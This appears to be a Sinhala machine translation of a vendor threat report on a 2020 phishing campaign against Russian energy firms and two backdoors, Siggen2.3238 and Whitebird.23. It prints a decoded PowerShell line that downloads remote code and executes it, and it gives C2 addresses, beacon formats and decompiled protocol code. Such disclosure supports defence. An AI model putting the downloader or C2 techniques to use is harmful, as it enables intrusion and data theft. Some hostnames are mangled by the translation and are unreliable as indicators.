පරිගණක ආරක්ෂණ සිද්ධීන් විමර්ශනය කිරීමේ අපගේ අත්දැකීම පෙන්නුම් කරන්නේ ඊමේල් තවමත් ප්රහාරකයින් විසින් ප්රහාරයට ලක් වූ ජාල යටිතල ව්යුහයන් විනිවිද යාමට භාවිතා කරන වඩාත් පොදු නාලිකාවලින් එකක් බවයි. සැක සහිත (හෝ එතරම් සැක සහිත නොවන) ලිපියක් සහිත එක් නොසැලකිලිමත් ක්රියාවක් තවදුරටත් ආසාදනය සඳහා පිවිසුම් ලක්ෂ්යයක් බවට පත්වේ, එබැවින් සයිබර් අපරාධකරුවන් විවිධ මට්ටමේ සාර්ථකත්වයන් සමඟ වුවද සමාජ ඉංජිනේරු ක්රම ක්රියාකාරීව භාවිතා කරයි.
රුසියානු ඉන්ධන සහ බලශක්ති සංකීර්ණයේ ව්යවසායන් ගණනාවක් ඉලක්ක කරගත් ස්පෑම් ව්යාපාරයක් පිළිබඳ අපගේ මෑත විමර්ශනය ගැන මෙම පෝස්ට් එකේ කතා කිරීමට අපට අවශ්යය. සියලුම ප්රහාර ව්යාජ විද්යුත් තැපෑල භාවිතා කරමින් එකම දර්ශනයක් අනුගමනය කළ අතර, මෙම ඊමේල්වල පෙළ අන්තර්ගතයට කිසිවකු විශාල උත්සාහයක් ගෙන ඇති බවක් නොපෙනේ.
බුද්ධි සේවය
ඒ සියල්ල ආරම්භ වූයේ 2020 අප්රේල් මස අවසානයේදී, ඩොක්ටර් වෙබ් වෛරස් විශ්ලේෂකයින් විසින් රුසියානු ඉන්ධන සහ බලශක්ති සංකීර්ණයේ ව්යවසායන් ගණනාවක සේවකයින්ට යාවත්කාලීන දුරකථන නාමාවලියක් හැකර්වරුන් විසින් යවන ලද ස්පෑම් ව්යාපාරයක් අනාවරණය කරගත් විටය. ඇත්ත වශයෙන්ම, මෙය සරල සැලකිල්ලක් දැක්වීමක් නොවීය, නාමාවලිය සැබෑ නොවන අතර, .docx ලේඛන දුරස්ථ සම්පත් වලින් පින්තූර දෙකක් බාගත කර ඇත.
ඒවායින් එකක් news[.]zannews[.]com සේවාදායකයෙන් පරිශීලකයාගේ පරිගණකයට බාගත කර ඇත. වසම් නාමය කසකස්තානයේ දූෂණ විරෝධී මාධ්ය මධ්යස්ථානයේ වසම හා සමාන වීම සැලකිය යුතු කරුණකි - zannews[.]kz. අනෙක් අතට, භාවිතා කරන ලද වසම TOPNEWS ලෙස හැඳින්වෙන තවත් 2015 ප්රචාරණ ව්යාපාරයක් ක්ෂණිකව සිහිගන්වන අතර, එය ICEFOG පසුපස දොරක් භාවිතා කළ අතර ඔවුන්ගේ නම්වල "ප්රවෘත්ති" යන උපසිරසිය සහිත ට්රෝජන් පාලන වසම් තිබුණි. තවත් රසවත් ලක්ෂණයක් වූයේ විවිධ ලබන්නන් වෙත ලිපි යැවීමේදී, පින්තූරයක් බාගත කිරීම සඳහා ඉල්ලීම් විවිධ ඉල්ලීම් පරාමිති හෝ අද්විතීය රූප නාම භාවිතා කිරීමයි.
"විශ්වසනීය" ලිපිනකරුවෙකු හඳුනා ගැනීම සඳහා තොරතුරු රැස්කිරීමේ අරමුණින් මෙය සිදු කර ඇති බව අපි විශ්වාස කරමු, එවිට නියමිත වේලාවට ලිපිය විවෘත කිරීමට සහතික වනු ඇත. ලැබුණු ලේඛනය විවෘත කළ සේවකයින්ගේ පරිගණක වලින් NetNTLM හෑෂ් එකතු කිරීම සඳහා කළ හැකි දෙවන සේවාදායකයෙන් රූපය බාගත කිරීම සඳහා SMB ප්රොටෝකෝලය භාවිතා කරන ලදී.
ව්යාජ නාමාවලිය සහිත ලිපිය මෙන්න:
මෙම වසරේ ජුනි මාසයේදී හැකර්වරු පින්තූර උඩුගත කිරීම සඳහා නව ඩොමේන් නාමයක් වන ක්රීඩා[.]manhajnews[.]com භාවිතා කිරීමට පටන් ගත්හ. විශ්ලේෂණයෙන් පෙන්නුම් කළේ manhajnews[.]com උප ඩොමේන් අවම වශයෙන් 2019 සැප්තැම්බර් මාසයේ සිට අයාචිත තැපෑල සඳහා භාවිතා කර ඇති බවයි. මෙම ව්යාපාරයේ එක් ඉලක්කයක් වූයේ විශාල රුසියානු විශ්ව විද්යාලයකි.
එසේම, ජුනි මාසය වන විට, ප්රහාරයේ සංවිධායකයින් ඔවුන්ගේ ලිපි සඳහා නව පෙළක් ඉදිරිපත් කළහ: මෙවර ලේඛනයේ කර්මාන්ත සංවර්ධනය පිළිබඳ තොරතුරු අඩංගු විය. ලිපියේ පෙළ පැහැදිලිව පෙන්නුම් කළේ එහි කතුවරයා රුසියානු භාෂාවේ ස්වදේශික කථිකයෙකු නොවන බව හෝ හිතාමතාම ඔහු ගැන එවැනි හැඟීමක් ඇති කරන බවයි. අවාසනාවකට මෙන්, කර්මාන්ත සංවර්ධනය පිළිබඳ අදහස්, සෑම විටම, ආවරණයක් පමණක් බවට පත් විය - ලේඛනය නැවතත් පින්තූර දෙකක් බාගත කර ඇති අතර, සේවාදායකය බාගත[.]inklingpaper[.]com ලෙස වෙනස් කරන ලදී.
ඊළඟ නවෝත්පාදනය ජූලි මාසයේදී සිදු විය. ප්රති-වයිරස වැඩසටහන් මගින් අනිෂ්ට ලේඛන හඳුනාගැනීම මඟ හැරීමේ උත්සාහයක් ලෙස, ප්රහාරකයන් මුරපදයකින් සංකේතනය කරන ලද Microsoft Word ලේඛන භාවිතා කිරීමට පටන් ගත්හ. ඒ අතරම, ප්රහාරකයින් සම්භාව්ය සමාජ ඉංජිනේරු තාක්ෂණයක් භාවිතා කිරීමට තීරණය කළහ - විපාක දැනුම්දීම.
අභියාචනයේ පාඨය නැවතත් එම ශෛලියෙන්ම ලියා ඇති අතර, එය ලිපිනකරු අතර අමතර සැකයක් ඇති කළේය. රූපය බාගත කිරීම සඳහා සේවාදායකය ද වෙනස් නොවේ.
සෑම අවස්ථාවකදීම, ලිපි යැවීම සඳහා තැපෑලෙහි [.]ru සහ yandex[.]ru වසම්වල ලියාපදිංචි කර ඇති විද්යුත් තැපැල් පෙට්ටි භාවිතා කළ බව සලකන්න.
ප්රහාරය
2020 සැප්තැම්බර් මුල වන විට, එය ක්රියා කිරීමට කාලයයි. අපගේ වෛරස් විශ්ලේෂකයින් නව ප්රහාර රැල්ලක් වාර්තා කර ඇති අතර, ප්රහාරකයින් දුරකථන නාමාවලියක් යාවත්කාලීන කිරීමේ කඩතුරාව යටතේ නැවතත් ලිපි යවා ඇත. කෙසේ වෙතත්, මෙවර ඇමුණුමේ අනිෂ්ට මැක්රෝ එකක් අඩංගු විය.
අමුණා ඇති ලේඛනය විවෘත කරන විට, මැක්රෝ ගොනු දෙකක් නිර්මාණය කළේය:
- VBS ස්ක්රිප්ට් %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, කණ්ඩායම් ගොනුවක් දියත් කිරීමට අදහස් කරන ලදී;
- කාණ්ඩ ගොනුව ම %APPDATA%configstest.bat, අපැහැදිලි විය.
එහි කාර්යයේ සාරය සමහර පරාමිතීන් සමඟ Powershell කවචය දියත් කිරීමට පැමිණේ. කවචයට ලබා දුන් පරාමිති විධාන ලෙස විකේතනය කර ඇත:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;ඉදිරිපත් කරන ලද විධාන වලින් පහත පරිදි, ගෙවීම බාගත කරන වසම නැවත ප්රවෘත්ති වෙබ් අඩවියක් ලෙස වෙස්වළා ගනී. සරල එකක් , එහි එකම කාර්යය වන්නේ විධාන සහ පාලන සේවාදායකයෙන් shellcode ලබාගෙන එය ක්රියාත්මක කිරීමයි. වින්දිතයාගේ පරිගණකයේ ස්ථාපනය කළ හැකි පසුපස දොරවල් වර්ග දෙකක් හඳුනා ගැනීමට අපට හැකි විය.
BackDoor.Siggen2.3238
පළමු එක තමයි BackDoor.Siggen2.3238 - අපගේ විශේෂඥයින් මීට පෙර හමු වී නොතිබූ අතර, වෙනත් ප්රති-වයිරස වෙළෙන්දන් විසින් මෙම වැඩසටහන ගැන සඳහනක් නොතිබුණි.
මෙම වැඩසටහන C++ වලින් ලියා ඇති පිටුපස දොරක් වන අතර 32-bit Windows මෙහෙයුම් පද්ධති මත ක්රියාත්මක වේ.
BackDoor.Siggen2.3238 ප්රොටෝකෝල දෙකක් භාවිතා කරමින් කළමනාකරණ සේවාදායකය සමඟ සන්නිවේදනය කිරීමට හැකි වේ: HTTP සහ HTTPS. පරීක්ෂා කරන ලද නියැදිය HTTPS ප්රොටෝකෝලය භාවිතා කරයි. සේවාදායකය වෙත ඉල්ලීම් වලදී පහත පරිශීලක නියෝජිතයා භාවිතා වේ:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
මෙම අවස්ථාවෙහිදී, සියලුම ඉල්ලීම් පහත සඳහන් පරාමිතීන් සමඟ සපයනු ලැබේ:
%s;type=%s;length=%s;realdata=%send
එහිදී එක් එක් පේළිය %s අනුරූපව ප්රතිස්ථාපනය වේ:
- ආසාදිත පරිගණකයේ හැඳුනුම්පත,
- යවන ඉල්ලීම් වර්ගය,
- සැබෑ දත්ත ක්ෂේත්රයේ දත්තවල දිග,
- දත්ත.
ආසාදිත පද්ධතිය පිළිබඳ තොරතුරු රැස් කිරීමේ අදියරේදී, පිටුපස දොර මෙවැනි රේඛාවක් ජනනය කරයි:
lan=%s;cmpname=%s;username=%s;version=%s;
එහිදී lan යනු ආසාදිත පරිගණකයේ IP ලිපිනය, cmpname යනු පරිගණකයේ නම, පරිශීලක නාමය පරිශීලක නාමය, අනුවාදය 0.0.4.03 රේඛාව වේ.
sysinfo හැඳුනුම්කාරකය සහිත මෙම තොරතුරු https[:]//31.214[.]157.14/log.txt හි පිහිටි පාලන සේවාදායකය වෙත POST ඉල්ලීමක් හරහා යවනු ලැබේ. ප්රතිචාර වශයෙන් නම් BackDoor.Siggen2.3238 HEART සංඥාව ලබා ගනී, සම්බන්ධතාවය සාර්ථක ලෙස සලකනු ලැබේ, සහ පසුපස දොර සේවාදායකය සමඟ සන්නිවේදනයේ ප්රධාන චක්රය ආරම්භ කරයි.
මෙහෙයුම් මූලධර්ම පිළිබඳ වඩාත් සම්පූර්ණ විස්තරය BackDoor.Siggen2.3238 අපගේ තුල වේ .
BackDoor.Whitebird.23
දෙවන වැඩසටහන වන්නේ BackDoor.Whitebird backdoor හි වෙනස් කිරීමකි, කසකස්තානයේ රජයේ ආයතනයක් සමඟ ඇති වූ සිද්ධියෙන් අප දැනටමත් දන්නා කරුණකි. මෙම අනුවාදය C++ වලින් ලියා ඇති අතර එය 32-bit සහ 64-bit Windows මෙහෙයුම් පද්ධති දෙකෙහිම ධාවනය කිරීමට සැලසුම් කර ඇත.
මෙම වර්ගයේ බොහෝ වැඩසටහන් මෙන්, BackDoor.Whitebird.23 ආසාදිත පරිගණකයක පාලන සේවාදායකය සහ අනවසර පාලනය සමඟ සංකේතාත්මක සම්බන්ධතාවයක් ස්ථාපිත කිරීමට සැලසුම් කර ඇත. dropper භාවිතා කරමින් සම්මුතිගත පද්ධතියකට ස්ථාපනය කර ඇත .
අප විසින් පරීක්ෂා කරන ලද නියැදිය අපනයන දෙකක් සහිත අනිෂ්ට පුස්තකාලයකි:
- Google Play
- පරීක්ෂණය.
එහි වැඩ ආරම්භයේ දී, එය බයිට් 0x99 සමඟ XOR මෙහෙයුම මත පදනම් වූ ඇල්ගොරිතමයක් භාවිතා කරමින් පිටුපස දොරට සවි කර ඇති වින්යාසය විකේතනය කරයි. වින්යාසය පෙනෙන්නේ:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
එහි නිරන්තර ක්රියාකාරිත්වය සහතික කිරීම සඳහා, පිටුපස දොර ක්ෂේත්රයේ දක්වා ඇති අගය වෙනස් කරයි වැඩ කරන පැය සැකසුම්. ක්ෂේත්රයේ බයිට් 1440ක් අඩංගු වන අතර, එය 0 හෝ 1 අගයන් ගන්නා අතර දවසේ සෑම පැයකම සෑම මිනිත්තුවක්ම නියෝජනය කරයි. අතුරු මුහුණතට සවන් දෙන සහ ආසාදිත පරිගණකයෙන් ප්රොක්සි සේවාදායකයේ අවසර පැකට් සොයන සෑම ජාල අතුරුමුහුණතක් සඳහාම වෙනම නූල් සාදන්න. එවැනි පැකට්ටුවක් අනාවරණය වූ විට, පිටුපස දොර එහි ලැයිස්තුවට ප්රොක්සි සේවාදායකය පිළිබඳ තොරතුරු එක් කරයි. ඊට අමතරව, WinAPI හරහා ප්රොක්සියක් තිබේදැයි පරීක්ෂා කරයි InternetQueryOptionW.
වැඩසටහන වත්මන් මිනිත්තුව සහ පැය පරීක්ෂා කර එය ක්ෂේත්රයේ දත්ත සමඟ සංසන්දනය කරයි වැඩ කරන පැය සැකසුම්. දවසේ අනුරූප මිනිත්තුව සඳහා අගය ශුන්ය නොවේ නම්, පාලක සේවාදායකය සමඟ සම්බන්ධතාවයක් ස්ථාපිත කෙරේ.
සේවාදායකයට සම්බන්ධතාවයක් ස්ථාපනය කිරීම සේවාලාභියා සහ සේවාදායකය අතර TLS අනුවාදය 1.0 ප්රොටෝකෝලය භාවිතයෙන් සම්බන්ධතාවයක් නිර්මාණය කිරීම අනුකරණය කරයි. පසුපස දොරේ බඳ බෆර දෙකක් අඩංගු වේ.
පළමු බෆරයේ TLS 1.0 Client Hello පැකට්ටුව අඩංගු වේ.
දෙවන බෆරයේ TLS 1.0 Client Key Exchange පැකට් 0x100 බයිට්, වෙනස් කිරීමේ කේතාංක පිරිවිතර, සංකේතාත්මක හෑන්ඩ්ෂේක් පණිවිඩය අඩංගු වේ.
Client Hello පැකට්ටුවක් යවන විට, පහත පරිදි ගණනය කරන ලද Client Random ක්ෂේත්රයෙහි පසුබිම් දොර වත්මන් වේලාවෙන් බයිට් 4ක් සහ ව්යාජ අහඹු දත්ත බයිට 28ක් ලියයි:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
ලැබුණු පැකට්ටුව පාලක සේවාදායකයට යවනු ලැබේ. ප්රතිචාරය (සේවාදායක හෙලෝ පැකට්ටුව) පරීක්ෂා කරයි:
- TLS ප්රොටෝකෝලය අනුවාදය 1.0 සමඟ අනුකූල වීම;
- සේවාදායකයා විසින් නිශ්චිතව දක්වා ඇති කාල මුද්රාවට සේවාලාභියා විසින් නියම කරන ලද කාල මුද්රාව (සසම්භාවී දත්ත පැකට් ක්ෂේත්රයේ පළමු බයිට් 4) ලිපි හුවමාරුව;
- සේවාලාභියාගේ සහ සේවාදායකයේ සසම්භාවී දත්ත ක්ෂේත්රයේ කාල මුද්රාවෙන් පසු පළමු බයිට 4 ට ගැලපීම.
නිශ්චිත ගැලපීම් වලදී, පිටුපස දොර සේවාලාභී යතුරු හුවමාරු පැකට්ටුවක් සකස් කරයි. මෙය සිදු කිරීම සඳහා, එය Client Key Exchange පැකේජයේ ඇති පොදු යතුර වෙනස් කරයි, එසේම සංකේතනය කරන ලද Handshake Message පැකේජයේ ඇති සංකේතාංකන IV සහ සංකේතාංකන දත්ත වෙනස් කරයි.
පසුපස දොර විධාන සහ පාලන සේවාදායකයෙන් පැකට්ටුව ලබා ගනී, TLS ප්රොටෝකෝල අනුවාදය 1.0 දැයි පරීක්ෂා කරයි, පසුව තවත් බයිට් 54 ක් (පැකට්ටුවේ ශරීරය) පිළිගනී. මෙය සම්බන්ධතා සැකසුම සම්පූර්ණ කරයි.
මෙහෙයුම් මූලධර්ම පිළිබඳ වඩාත් සම්පූර්ණ විස්තරය BackDoor.Whitebird.23 අපගේ තුල වේ .
නිගමනය සහ නිගමන
ලේඛන, අනිෂ්ට මෘදුකාංග සහ භාවිතා කරන යටිතල පහසුකම් විශ්ලේෂණය කිරීමෙන් ප්රහාරය චීන APT කණ්ඩායමක් විසින් සකස් කරන ලද බව විශ්වාසයෙන් පැවසීමට අපට ඉඩ සලසයි. සාර්ථක ප්රහාරයක දී වින්දිතයන්ගේ පරිගණකවල ස්ථාපනය කර ඇති පසුබිම් දොරවල්වල ක්රියාකාරීත්වය සැලකිල්ලට ගනිමින්, ආසාදනය අවම වශයෙන්, ප්රහාරයට ලක් වූ සංවිධානවල පරිගණකවල රහස්ය තොරතුරු සොරකම් කිරීමට මඟ පාදයි.
මීට අමතරව, බොහෝ දුරට ඉඩ ඇති අවස්ථාවක් වන්නේ විශේෂ කාර්යයක් සහිත දේශීය සේවාදායකයන් මත විශේෂිත ට්රෝජන් ස්ථාපනය කිරීමයි. මේවා වසම් පාලකයන්, තැපැල් සේවාදායකයන්, අන්තර්ජාල ද්වාර ආදිය විය හැකිය. උදාහරණයෙන් අපට දැකිය හැකි පරිදි , එවැනි සේවාදායකයන් විවිධ හේතූන් මත ප්රහාරකයන්ට විශේෂ උනන්දුවක් දක්වයි.
මූලාශ්රය: www.habr.com